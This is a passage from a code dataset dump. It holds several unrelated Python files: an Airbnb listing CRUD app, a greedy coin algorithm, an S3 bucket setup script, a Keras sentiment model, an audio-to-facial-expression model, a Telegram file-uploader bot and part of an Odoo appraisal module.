(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n cursor.execute(sql, (listing_name, listing_price, listing_latitude, listing_longitude, listing_min_nights, listing_max_nights, listing_desc, listing_occupancy, listing_bedrooms, listing_bathrooms, \n listing_license, listing_has_availability, st.session_state.user_id, \n listing_neighbourhood_id, listing_property_type_name, listing_room_type_name, listing_amenities))\n connection.commit()\n st.write(\"Listing created!\")\n\n \n\ndef edit_host_listings(connection):\n with connection.cursor() as cursor:\n # Retrieve all listings from Listings table for the current user\n sql = \"SELECT * FROM 
Listings WHERE host_id = %s\"\n cursor.execute(sql, st.session_state.user_id)\n listings = cursor.fetchall()\n\n if listings:\n # Create a list of listing names to display in the dropdown\n listing_names = [listing['name'] for listing in listings]\n\n # Create the listing dropdown\n st.markdown(\"
<h3>Your Listings</h3>
\", unsafe_allow_html=True)\n selected_listing_name = st.selectbox(\"Select a listing to edit:\", listing_names)\n\n # Get the selected listing's ID\n selected_listing_id = None\n for listing in listings:\n if listing['name'] == selected_listing_name:\n selected_listing_id = listing['listing_id']\n break\n\n # Get the current values of the selected listing\n selected_listing = None\n for listing in listings:\n if listing['listing_id'] == selected_listing_id:\n selected_listing = listing\n break\n st.markdown(\"
<h3>Details</h3>
\", unsafe_allow_html=True)\n with connection.cursor() as cursor:\n # Query all neighbourhood names from the database\n sql = \"SELECT neighbourhood_id, name FROM Neighbourhoods\"\n cursor.execute(sql)\n neighbourhoods = cursor.fetchall()\n neighbourhood_names = [neighbourhood['name'] for neighbourhood in neighbourhoods]\n\n # Retrieve all property type names from PropertyTypes table\n cursor.execute(\"SELECT property_type_name FROM PropertyTypes\")\n property_types = cursor.fetchall()\n property_type_names = [pt['property_type_name'] for pt in property_types]\n\n # Retrieve all room type names from RoomTypes table\n cursor.execute(\"SELECT room_type_name FROM RoomTypes\")\n room_type_names = [row[\"room_type_name\"] for row in cursor.fetchall()]\n\n # # Retrieve all listings from Listings table\n # cursor.execute(\"SELECT * FROM Listings\")\n # listings = cursor.fetchall()\n\n\n # Find the selected listing and pre-fill the input fields with the existing data\n for listing in listings:\n if listing[\"name\"] == selected_listing_name:\n listing_id = listing[\"listing_id\"]\n listing_name = st.text_input(\"Listing Name\", value=listing[\"name\"])\n listing_price = st.number_input(\"Listing Price\", value=listing[\"price\"])\n listing_latitude = st.number_input(\"Listing Latitude\", value=listing[\"latitude\"])\n listing_longitude = st.number_input(\"Listing Longitude\", value=listing[\"longitude\"])\n listing_min_nights = st.number_input(\"Minimum Nights\", value=listing[\"minimum_nights\"])\n listing_max_nights = st.number_input(\"Maximum Nights\", value=listing[\"maximum_nights\"])\n listing_desc = st.text_input(\"Description\", value=listing[\"description\"])\n listing_occupancy = st.number_input(\"Occupancy\", value=listing[\"occupancy\"])\n listing_bedrooms = st.number_input(\"Bedrooms\", value=listing[\"bedrooms\"])\n listing_bathrooms = st.number_input(\"Bathrooms\", value=listing[\"bathrooms\"])\n listing_license = st.text_input(\"License\", value=listing[\"license\"])\n listing_has_availability = st.checkbox(\"Has Availability\", value=listing[\"has_availability\"])\n listing_neighbourhood_name = st.selectbox(\"Neighbourhood\", neighbourhood_names)\n listing_neighbourhood_id = next(neighbourhood['neighbourhood_id'] for neighbourhood in neighbourhoods \n if neighbourhood['name'] == listing_neighbourhood_name)\n listing_property_type_name = st.selectbox(\"Property Type\", property_type_names, index=property_type_names.index(listing[\"property_type_name\"]))\n listing_room_type_name = st.selectbox(\"Room Type\", room_type_names, index=room_type_names.index(listing[\"room_type_name\"]))\n listing_amenities = st.text_input(\"Amenities\", value=listing[\"amenities\"])\n\n # Update listing in the database if user clicks \"Save Changes\"\n if st.button(\"Save Changes\"):\n if listing_name.strip() == \"\":\n st.write(\"Listing name cannot be empty!\")\n elif listing_license.strip() == \"\":\n st.write(\"License is needed!\")\n else:\n with connection.cursor() as cursor:\n sql = \"UPDATE Listings SET name=%s, price=%s, latitude=%s, longitude=%s, minimum_nights=%s, maximum_nights=%s, description=%s, occupancy=%s, bedrooms=%s, bathrooms=%s, license=%s, has_availability=%s, neighbourhood_id=%s, property_type_name=%s, room_type_name=%s, amenities=%s WHERE listing_id=%s\"\n cursor.execute(sql, (listing_name, listing_price, listing_latitude, listing_longitude, listing_min_nights, \n listing_max_nights, listing_desc, listing_occupancy, listing_bedrooms, listing_bathrooms, \n listing_license, 
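The UPDATE above passes every value through a placeholder parameter instead of interpolating strings, which is what keeps the query safe from SQL injection. The same pattern with the stdlib sqlite3 driver ('?' placeholders rather than pymysql's '%s'; standalone sketch, not this app's schema):

    import sqlite3

    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE listings (listing_id INTEGER, name TEXT)")
    con.execute("INSERT INTO listings VALUES (?, ?)", (1, "old name"))
    con.execute("UPDATE listings SET name = ? WHERE listing_id = ?", ("new name", 1))
    print(con.execute("SELECT name FROM listings").fetchone())  # ('new name',)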
listing_has_availability, listing_neighbourhood_id, listing_property_type_name, listing_room_type_name, listing_amenities, listing_id))\n connection.commit()\n st.write(\"Listing updated!\")\n else:\n st.markdown(\"
<h3>You have no listings!</h3>
\", unsafe_allow_html=True)\n\ndef delete_host_listings(connection):\n # Get the host's listings from the database\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM Listings WHERE host_id = %s\"\n cursor.execute(sql, st.session_state.user_id)\n listings = cursor.fetchall()\n\n # Check if the host has any listings\n if listings:\n # Display the host's listings and allow them to select one to delete\n # st.write(\"Select a listing to delete:\")\n options = {f\"{listing['name']}\" : listing for listing in listings}\n st.markdown(\"
<h3>Your Listings</h3>
\", unsafe_allow_html=True)\n selected_option = st.selectbox(\"Select a listing to delete:\", list(options.keys()))\n\n\n # Confirm deletion before proceeding\n if st.button(\"Delete\"):\n try:\n with connection.cursor() as cursor:\n sql = \"DELETE FROM Listings WHERE listing_id = %s\"\n cursor.execute(sql, options[selected_option][\"listing_id\"])\n connection.commit()\n st.success(\"Listing deleted.\")\n except Exception as e:\n st.error(f\"Error deleting listing: {e}\")\n else:\n st.markdown(\"
<h3>You have no listings!</h3>
\", unsafe_allow_html=True)\n","repo_name":"joannjacob/Airbnb-Management-System","sub_path":"Application Code/code/host_crud.py","file_name":"host_crud.py","file_ext":"py","file_size_in_byte":13256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32852665304","text":"import sys\ninput = sys.stdin.readline\n\nn, k = map(int, input().split())\nlst = []\nfor _ in range(n):\n lst.append(int(input()))\nlst.sort(reverse=True)\ncnt = 0\n\nfor i in lst:\n cnt += k // i\n k %= i\nprint(cnt)","repo_name":"DohyunJegal/Baekjoon","sub_path":"class3/11047A.py","file_name":"11047A.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13344171982","text":"import boto3\nimport json\n\n# Replace these values with your AWS credentials and region\nregion_name = 'YOUR_REGION_NAME'\n\n# Initialize the S3 client\nsession = boto3.Session(profile_name='default')\ns3 = session.client('s3')\n\n# Name of the bucket you want to create\nbucket_name = 'bayesian-soccer-traces-matthew-burke'\n\n# Create the bucket\ntry:\n s3.create_bucket(Bucket=bucket_name, CreateBucketConfiguration={'LocationConstraint': 'us-east-2'})\nexcept:\n print('bucket alread exists')\n\n# Define the bucket policy to allow public read access\nbucket_policy = {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Principal\": \"*\",\n \"Action\": \"s3:GetObject\",\n \"Resource\": f\"arn:aws:s3:::{bucket_name}/*\"\n }\n ]\n}\n\n# Convert the bucket policy to JSON format\nbucket_policy_json = json.dumps(bucket_policy)\n\n# Apply the bucket policy\ns3.put_bucket_policy(Bucket=bucket_name, Policy=bucket_policy_json)\n\nprint(f\"Bucket '{bucket_name}' created with public read permissions.\")\n","repo_name":"MatthewBurke1995/Chalice-application","sub_path":"startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"35087404392","text":"from keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Embedding, LSTM, Bidirectional, Activation, TimeDistributed\nfrom keras.models import model_from_json\nfrom keras import metrics\nfrom keras import optimizers\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nimport itertools\n\nnum_nb_epoch = 2\nmaxlen = 15 # cut texts after this number of words (among top max_features most common words)\nbatch_size = 20\n\n#Credit: http://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html#sphx-glr-auto-examples-model-selection-plot-confusion-matrix-py\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n thresh = cm.max() / 
2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, cm[i, j],\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\ncv = pickle.load(open(\"vocab.p\", \"rb\"))\nmax_features = len(cv.vocabulary_)\nprint('The vocabulary size is {0}'.format(max_features))\n\nprint('Loading data...')\nX = np.loadtxt(\"sequence_data\")\ny = np.loadtxt(\"sequence_labels\")\nX_train, X_test, y_train, y_test = train_test_split(X, y)\nprint(len(X_train), 'train sequences')\nprint(len(X_test), 'test sequences')\n\nprint(\"Pad sequences (samples x time)\")\nX_train = sequence.pad_sequences(X_train, maxlen=maxlen)\nX_test = sequence.pad_sequences(X_test, maxlen=maxlen)\nprint('X_train shape:', X_train.shape)\nprint('X_test shape:', X_test.shape)\ny_train = np.array(y_train)\ny_test = np.array(y_test)\n\nmodel = Sequential()\nmodel.add(Embedding(max_features, 256, input_length=maxlen))\nmodel.add(Bidirectional(LSTM(128, return_sequences=True)))\nmodel.add(Bidirectional(LSTM(64)))\nmodel.add(Dropout(0.9))\nmodel.add(Dense(32))\nmodel.add(Dense(16))\nmodel.add(Dropout(0.6)) # try different dropout rates- 0.5\nmodel.add(Dense(8))\nmodel.add(Dense(3, activation='softmax'))\n\n# Use either adam, Nadam, Adagrad,or RMSprop as optimizer.\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\nprint('Train...')\nmodel.fit(X_train, y_train,\n batch_size=batch_size,\n nb_epoch=num_nb_epoch,\n validation_data=[X_test, y_test])\n\nprint('Saving the model to \\\"model.json\\\"')\n\n#Save the model to json file\nmodel_json = model.to_json()\nwith open(\"model.json\", \"w\") as json_file:\n json_file.write(model_json)\n#serialize weights to HDF5\nprint('Saving the weights to model.h5')\nmodel.save_weights(\"model.h5\")\n\nprint('Creating Confusion Matrix Based on Test Data...')\ny_pred = model.predict(x=X_test, verbose=1)\ny_pred_new = np.empty(len(y_pred))\ny_test_new = np.empty(len(y_test))\nclass_names = ('Positive', 'Neutral', 'Negative')\n\nfor row_num in range(0, len(y_pred)):\n y_pred_new[row_num] = np.argmax(y_pred[row_num])\n y_test_new[row_num] = np.argmax(y_test[row_num])\n\n# Compute confusion matrix\ncnf_matrix = confusion_matrix(y_true=y_test_new, y_pred=y_pred_new)\nnp.set_printoptions(precision=2)\n\n# Plot normalized confusion matrix\nplt.figure()\nplot_confusion_matrix(cnf_matrix, classes=class_names, normalize=True,\n title='Normalized confusion matrix')\n\nplt.figure()\nclass_totals = np.sum(y, axis=0) / len(y)\ny_pos = np.arange(len(class_names))\n\nplt.bar(y_pos, class_totals, align='center', alpha=0.5)\nplt.xticks(y_pos, class_names)\nplt.ylabel('Frequency')\nplt.title('Frequency of Sentiments in Data Set')\n\nplt.show()\n","repo_name":"ehelenowski/BlackBoxNLPMimicking","sub_path":"new_model.py","file_name":"new_model.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20845452185","text":"import copy\nimport math\nimport json\nimport resampy\n\nimport numpy as np\nimport tensorflow as tf\nfrom scipy.io import wavfile\n\nfrom python_speech_features import mfcc\n\n\nclass A2E(object):\n def __init__(self, path_model_ds=\"model/deepspeech.pb\", path_model_a2e=\"model/a2e.pb\", path_3dmm_info=\"data/facecap\"):\n self.path_model_ds = path_model_ds\n self.path_model_a2e = path_model_a2e\n self.path_3dmm_info = 
path_3dmm_info\n\n        self.audio_handler = AudioHandler(path_model_ds)\n\n    def build_model(self):\n        self.audio_handler.build_model()\n\n        with tf.io.gfile.GFile(self.path_model_a2e, \"rb\") as f:\n            graph_def = tf.GraphDef()\n            graph_def.ParseFromString(f.read())\n            tf.import_graph_def(graph_def, name=\"a2e\")\n\n        # build session\n        self.graph = tf.get_default_graph()\n        config = tf.ConfigProto(log_device_placement=False)\n        config.gpu_options.allow_growth = True\n\n        self.sess = tf.Session(graph=self.graph, config=config)\n\n        self.input_a2e = self.graph.get_tensor_by_name('a2e/audio:0')\n        self.output_a2e = self.graph.get_tensor_by_name('a2e/output:0')\n\n    def smooth(self, audio, window_len=3, window='hanning'):\n        s = np.r_[audio[window_len-1:0:-1], audio, audio[-2:-window_len-1:-1]]\n\n        if window == 'flat': # moving average\n            w = np.ones(window_len, 'd')\n        else:\n            w = eval('np.'+window+'(window_len)')\n\n        audio_smooth = np.convolve(w/w.sum(), s, mode='valid')\n        edge = window_len // 2\n        return audio_smooth[edge:-(edge)]\n\n    def get_expression_from_audio(self, path_audio, smooth=0):\n        input_audio = self.audio_handler.process_audio(path_audio)\n        output = self.sess.run(self.output_a2e, feed_dict={\n            self.input_a2e: input_audio})[0]\n        output[output < 0] = 0\n\n        if smooth > 0:\n            for i in range(51):\n                output[:, i] = self.smooth(output[:, i], window_len=smooth)\n\n        output = output.tolist()\n\n        return output\n\n\nclass AudioHandler(object):\n    def __init__(self, path_model=\"model/deepspeech.pb\", n_mfcc=26, n_context=9, fps=30, win_size=16, win_stride=1):\n        self.path_model = path_model\n        self.n_mfcc = n_mfcc\n        self.n_context = n_context\n        self.fps = fps\n        self.win_size = win_size\n        self.win_stride = win_stride\n\n    def build_model(self):\n        with tf.io.gfile.GFile(self.path_model, \"rb\") as f:\n            graph_def = tf.GraphDef()\n            graph_def.ParseFromString(f.read())\n            tf.import_graph_def(graph_def, name=\"deepspeech\")\n\n        # build session\n        self.graph = tf.get_default_graph()\n        config = tf.ConfigProto(log_device_placement=False)\n        config.gpu_options.allow_growth = True\n\n        self.sess = tf.Session(graph=self.graph, config=config)\n\n        # tensor\n        self.input_ds = self.graph.get_tensor_by_name(\n            'deepspeech/input_node:0')\n        self.seq_length_ds = self.graph.get_tensor_by_name(\n            'deepspeech/input_lengths:0')\n        self.output_ds = self.graph.get_tensor_by_name('deepspeech/logits:0')\n\n    def process_audio(self, path_audio):\n        sr, audio = wavfile.read(path_audio)\n\n        audio_len_s = float(audio.shape[0]) / sr\n        n_frames = int(math.ceil(audio_len_s * self.fps))\n\n        if audio.ndim != 1:\n            audio = audio[:, 0]\n\n        audio_copy = copy.deepcopy(audio)\n        audio_resample = resampy.resample(audio_copy.astype(float), sr, 16000)\n\n        audio_mfcc = self.convert_mfcc(audio_resample)\n        audio_ds_logit = self.get_deepspeech_logit(audio_mfcc)\n\n        audio_inter = self.interpolate_feature(\n            audio_ds_logit, 50, self.fps, n_frames)\n        return self.make_window(audio_inter, self.win_size, self.win_stride)\n\n    def convert_mfcc(self, audio):\n        audio_mfcc = mfcc(audio, samplerate=16000, numcep=self.n_mfcc)\n        audio_mfcc = audio_mfcc[::2]\n        n_strides = len(audio_mfcc)\n\n        empty_context = np.zeros(\n            (self.n_context, self.n_mfcc), dtype=audio_mfcc.dtype)\n        audio_mfcc = np.concatenate((empty_context, audio_mfcc, empty_context))\n\n        window_size = 2 * self.n_context + 1\n        audio_mfcc_window = np.lib.stride_tricks.as_strided(\n            audio_mfcc,\n            (n_strides, window_size, self.n_mfcc),\n            (audio_mfcc.strides[0], audio_mfcc.strides[0],\n             audio_mfcc.strides[1]),\n            writeable=False)\n\n        
audio_mfcc_window = np.reshape(audio_mfcc_window, [n_strides, -1])\n audio_mfcc_window = np.copy(audio_mfcc_window)\n audio_mfcc_window = (\n audio_mfcc_window - np.mean(audio_mfcc_window)) / np.std(audio_mfcc_window)\n\n return audio_mfcc_window\n\n def get_deepspeech_logit(self, audio_mfcc):\n output = self.sess.run(self.output_ds,\n feed_dict={self.input_ds: audio_mfcc[np.newaxis, ...],\n self.seq_length_ds: [audio_mfcc.shape[0]]})\n return output\n\n def interpolate_feature(self, input_features, input_rate, output_rate, n_frames):\n n_features = input_features[:, 0].shape[1]\n input_len = input_features[:, 0].shape[0]\n seq_len = input_len / float(input_rate)\n output_len = n_frames\n\n input_timestamps = np.arange(input_len) / float(input_rate)\n output_timestamps = np.arange(output_len) / float(output_rate)\n output_features = np.zeros((output_len, n_features))\n\n for feat in range(n_features):\n output_features[:, feat] = np.interp(\n output_timestamps, input_timestamps, input_features[:, 0][:, feat])\n\n return output_features\n\n def make_window(self, input_features, win_size, win_stride):\n # make_window\n zero_pad = np.zeros((int(win_size / 2), input_features.shape[1]))\n output = np.concatenate((zero_pad, input_features, zero_pad), axis=0)\n windows = []\n\n for win_index in range(0, output.shape[0] - win_size, win_stride):\n windows.append(output[win_index:win_index+win_size])\n\n return np.array(windows)\n","repo_name":"wjy5446/audio2expression","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"24877027811","text":"#!/usr/bin/python3\n\"\"\"\nMake a function that prints 2 new lines after\nevery \".\", \"?\" or \":\" in text, with the rest\nof the content in that text.\n\"\"\"\n\n\ndef text_indentation(text):\n \"\"\"\n Prints all the contents of the 'text' string,\n but printing 2 new line characters instead of\n every \".\", \"?\" or \":\".\n\n If 'text' is not a string, TypeError is raised.\n\n THE TEXT IS PRINTED WITHOUT A FINAL NEW LINE.\n \"\"\"\n if type(text) != str:\n raise TypeError(\"text must be a string\")\n\n result = text\n for punctuation in \".?:\":\n result = result.replace(punctuation, \"\\n\\n\")\n\n print(result, end=\"\")\n","repo_name":"GABETROLL/holbertonschool-higher_level_programming","sub_path":"python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29288329292","text":"#Modules\r\nimport os\r\nfrom pyrogram import Client, filters\r\nimport pyrogram\r\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, Message\r\nimport asyncio\r\nimport tgcrypto\r\nimport yt_dlp\r\nfrom yarl import URL\r\nimport pyshorteners\r\nimport qrcode\r\nfrom config import Config\r\nimport speedtest\r\n\r\nfrom config import Config\r\n\r\n#Client\r\nGigaChad = Client(\r\n \"GigaChad\",\r\n api_id = Config.API_ID,\r\n api_hash = Config.API_HASH,\r\n bot_token = Config.BOT_TOKEN\r\n)\r\n\r\n\r\n@GigaChad.on_message(filters.command(\"start\") & ~filters.edited)\r\nasync def Start(filters, message):\r\n print(f\"🤖The Bot was started by: {message.from_user.id}\\n{message.from_user.username}\\n\") #In Spanish: \"El bot ha sido comenzado por: \"\r\n await message.reply_photo(\"https://telegra.ph/file/90aa09730e63d35357221.png\")\r\n 
await message.reply_text(f\"🙃Usuario: {message.from_user.mention}\\n🆔ID: {message.from_user.id}\\n📛Nombre de Usuario: @{message.from_user.username}\\n\\nHola Humano, Soy un **Bot que sube archivos a Telegram, genera codigos QR y acorta enlaces**, puedo subir archivos directos desde varios sitios(Ejemplos: Uptodown.com, Malavida.com, Youtube.com, facebook.com,etc..., en proximas actualizaciones podras descargar desde MEGA, y vendran mas cosas increibles), Aqui puedes ver mas info acerca de mi creador😁👇\",\r\n reply_markup=InlineKeyboardMarkup([[\r\n InlineKeyboardButton(\"👾Github👾\", url=\"https://www.github.com/Tnoob-dev\"),\r\n InlineKeyboardButton(\"🔝Repo🔝\", url=\"https://github.com/Tnoob-dev/GigaChad-bot\"),\r\n InlineKeyboardButton(\"🐦Twitter🐦\", url=\"https://twitter.com/TitiLM30\")\r\n ],\r\n [InlineKeyboardButton(\"⌨️Canal interesante⌨️\", url=\"https://t.me/s3softwareyprogramacion\"),\r\n\r\n InlineKeyboardButton(\"💻Grupo adjunto💻\", url=\"https://t.me/S3SPGrupo\")\r\n ],\r\n [InlineKeyboardButton(\"🇬🇧Text in English🇬🇧\", callback_data='ingles_start')]\r\n ]))\r\n await message.reply_text(\"**🇬🇧Note: Send /help to know what i can do\\n\\n🇪🇸Nota: Envia /help para conocer que puedo hacer**\")\r\n\r\n@GigaChad.on_callback_query(filters.regex('ingles_start'))\r\nasync def start_query(client, callback_query):\r\n await callback_query.answer()\r\n await callback_query.message.edit_text(\"Hi Human, I'm a **Uploader to Telegram bot, i can generate QR Codes too, and short URLs**, i can upload files from some sites(Example: Uptodown.com, Malavida.com, Youtube.com, facebook.com,etc..., in other actualizations will come MEGA, and other amazing things), Here you can see more info about my Creator😁👇\",\r\n \r\n reply_markup=InlineKeyboardMarkup([[\r\n InlineKeyboardButton(\"👾Github👾\", url=\"https://www.github.com/Tnoob-dev\"),\r\n InlineKeyboardButton(\"🔝Repo🔝\", url=\"https://github.com/Tnoob-dev/GigaChad-bot\"),\r\n InlineKeyboardButton(\"🐦Twitter🐦\", url=\"https://twitter.com/TitiLM30\")\r\n ],\r\n [InlineKeyboardButton(\"⌨️Interesting Channel⌨️\", url=\"https://t.me/s3softwareyprogramacion\"),\r\n\r\n InlineKeyboardButton(\"💻attached group💻\", url=\"https://t.me/S3SPGrupo\")\r\n ]]))\r\n\r\n\r\n\r\n@GigaChad.on_message(filters.command(\"help\") & ~filters.edited)\r\nasync def ayuda(filters, message):\r\n await message.reply_photo(\"https://telegra.ph/file/86a8426af71ef4f7eeec8.png\")\r\n await message.reply_text(\"Envia /download y luego el link de descarga, lo descargare y luego te enviare el archivo\\n\\nEnvia /qr y luego un texto, y te generare un codigo QR con el texto dentro\\n\\nEnvia /short y luego un link y te enviare un link acortado con el link que enviaste\\n\\nEnvia /speedtest para hacer un pequeño Test de rapidez y ver la velocidad de Bajada/subida\\n\\n**Nota**: Si envias un enlace y el bot no lo reconoce, puedes enviar el enlace a @DirectLinkGeneratorbot, @DirectLinkGen_bot o @MaxFile2LinkBot.\", \r\n \r\n reply_markup= InlineKeyboardMarkup([[\r\n\r\n InlineKeyboardButton(\"🇬🇧Text in English🇬🇧\", callback_data='ingles_help'),\r\n ]]\r\n )\r\n )\r\n\r\n@GigaChad.on_callback_query(filters.regex('ingles_help'))\r\nasync def help_query(client, callback_query):\r\n await callback_query.answer()\r\n await callback_query.message.edit_text(\"Send /download and later send me the link, i will Download it and send you the file\\n\\nSend /qr and later a text and i will generate you a QR Code with the text\\n\\nSend /short and later send a link and i will short it\\n\\nSend /speedtest to 
do a quick speedtest and check the Download/Upload speed\n\nNote: If you want to upload some other things and the bot doesn't recognize it, you can go to @DirectLinkGeneratorbot, @DirectLinkGen_bot or @MaxFile2LinkBot.\")\r\n\r\n\r\n@GigaChad.on_callback_query(filters.regex('close'))\r\nasync def help_query(client, callback_query):\r\n    await callback_query.answer()\r\n    await callback_query.message.delete()\r\n\r\n\r\nConversation_state = {} \r\n\r\n\r\n@GigaChad.on_message() #the filters and that stuff\r\nasync def msg_handler(client, message: Message):\r\n    dwnlad = message.text #message sent by the User\r\n    pal = f\"✅✅Upload Success✅✅\\nUploaded By @Uploader_Tbot\\nRemember GigaChad Loves u😘\\nThe file was requested by: {message.from_user.id}\" #The caption that will be shown beside the file when it is uploaded\r\n    pal_qr = f\"✅✅QR Generated✅✅\\nUploaded By @Uploader_Tbot\\nRemember GigaChad Loves u😘\\nThe QR was requested by: {message.from_user.id}\"\r\n    who = message.from_user.id\r\n    state = Conversation_state.get(who)\r\n    chatid = message.chat.id\r\n    \r\n    DOWNLOAD_LINK = 0\r\n\r\n    if state is None and message.text == \"/download\":\r\n        await message.reply_text(\"🙃Give me a link to download🙃\")\r\n        Conversation_state[who] = DOWNLOAD_LINK\r\n        \r\n        return\r\n\r\n    if state == DOWNLOAD_LINK and URL(dwnlad).scheme and URL(dwnlad).host:\r\n        del Conversation_state[who]\r\n        \r\n        m = await message.reply_text(\"⬇️**Downloading the file**⬇️\")\r\n        try:\r\n            loop = asyncio.get_running_loop()\r\n\r\n            ytdownload = yt_dlp.YoutubeDL({\"logger\": YT_DLP_LOGGER()})\r\n            fdata = await loop.run_in_executor(None, ytdownload.extract_info, dwnlad)\r\n            fname = ytdownload.prepare_filename(fdata)\r\n            await asyncio.sleep(2)\r\n            await GigaChad.send_chat_action(chat_id = chatid,action=\"upload_document\")\r\n            await m.edit(\"**⬆️Uploading the archive⬆️**\")\r\n            await asyncio.sleep(5)\r\n            await m.delete()\r\n            await message.reply_document(fname, caption=pal)\r\n        except Exception:\r\n            await m.edit(\"❌Not a supported link❌\")\r\n\r\n        return\r\n\r\n    QR = 1\r\n    if state is None and message.text == \"/qr\":\r\n        await message.reply_text(\"✍️Send me the text to generate QR✍️\")\r\n        Conversation_state[who] = QR\r\n\r\n    if state == QR and dwnlad:\r\n        del Conversation_state[who]\r\n        filename = \"qr\" + \".png\"\r\n\r\n        img = qrcode.make(dwnlad)\r\n        img.save(filename)\r\n\r\n        await GigaChad.send_chat_action(chat_id=chatid, action=\"upload_photo\")\r\n        await message.reply_photo(filename, caption=pal_qr)\r\n\r\n        os.remove(filename)\r\n        return\r\n\r\n    SHORT = 2\r\n    if state is None and message.text == \"/short\":\r\n        await message.reply_text(\"✍️Send me a link to shorten it✍️\")\r\n        Conversation_state[who] = SHORT\r\n\r\n    if state == SHORT and dwnlad:\r\n        del Conversation_state[who]\r\n        \r\n        s = pyshorteners.Shortener()\r\n\r\n        short_clckru = s.clckru.short(dwnlad)\r\n        short_dagd = s.dagd.short(dwnlad)\r\n        short_osdb = s.osdb.short(dwnlad)\r\n\r\n        await GigaChad.send_chat_action(chat_id=chatid, action=\"typing\")\r\n        await message.reply_text(\"✅✅Here you have your link shortened:\\n\\n😆From Clck.ru: \\n\\n\" + short_clckru + \"\\n\\n🙃From Da.gd: \\n\\n\" + short_dagd + \"\\n\\n😁From Os.db: \\n\\n\" + short_osdb + \"\\n\\n\\nThanks for using @Uploader_Tbot😊\", disable_web_page_preview=True)\r\n\r\n        return\r\n    test = speedtest.Speedtest()\r\n    if message.text == \"/speedtest\":\r\n        a = await message.reply_text(\"**Generating speedtest... please wait, this can take a moment**\")\r\n        \r\n        up_res = test.upload()\r\n        down_res = 
test.download()\r\n ping_res = test.results.ping\r\n await a.edit(f\"```Subida: {up_res / 1024 / 1024 / 8:.2f} Mb/s\\nBajada: {down_res / 1024 / 1024 / 8:.2f} Mb/s\\nPing: {ping_res} ms```\\n\\n__Bot Hosted in:__ **Heroku❤️**\")\r\n return\r\n\r\n#Start the bot :)\r\nprint(\"Bot running\")\r\n\r\nif __name__ == '__main__':\r\n GigaChad.run()\r\n","repo_name":"ibany2711/GigaChad-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":8600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21944825521","text":"from datetime import datetime, timedelta\r\nimport time\r\nimport base64\r\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT\r\nfrom odoo import models, fields, api, _, SUPERUSER_ID\r\nfrom odoo.exceptions import ValidationError\r\nfrom odoo import http\r\nimport logging\r\nfrom lxml import etree\r\n\r\n_logger = logging.getLogger(__name__)\r\n\r\n\r\nclass HrEmployeeAppraisal(models.Model):\r\n _name = \"usl.employee.appraisal\"\r\n _description= \"Employee Appraisal\"\r\n _order = \"id desc\"\r\n _inherit = ['mail.thread']\r\n\r\n name = fields.Char(string=\"Description\", readonly=True)\r\n sequence = fields.Char(string=\"# ID\", readonly=True)\r\n appraisal_config_id = fields.Many2one('usl.appraisal.config', \r\n string=\"Appraisal Config ID\", required=True, readonly=True)\r\n template_id = fields.Many2one('usl.appraisal.template', string=\"Template\")\r\n employee_id = fields.Many2one('hr.employee', string=\"Employee\", required=False, readonly=True)\r\n line_manager_id = fields.Many2one('hr.employee', string=\"Line Manager\")\r\n approver_ids = fields.Many2many('hr.employee', string=\"Approvers\",readonly=True)\r\n department_id = fields.Many2one('hr.department', string=\"Department\",readonly=True)\r\n unit_id = fields.Char(string=\"Unit\", readonly=True)\r\n directed_user_id = fields.Many2one('res.users', string=\"Appraisal with ?\", readonly=True)\r\n job_title = fields.Many2one('hr.job', string=\"Job title\", readonly=True)\r\n date_from = fields.Date(string=\"Date From\", readonly=True, store=True)\r\n date_end = fields.Date(string=\"Date End\", readonly=True)\r\n deadline = fields.Date(string=\"Deadline Date\", compute=\"get_appraisal_deadline\", store=True)\r\n key_strength = fields.Text(string=\"Key Strengths to Continue\")\r\n key_development = fields.Text(string=\"Key Development Opportunites\")\r\n 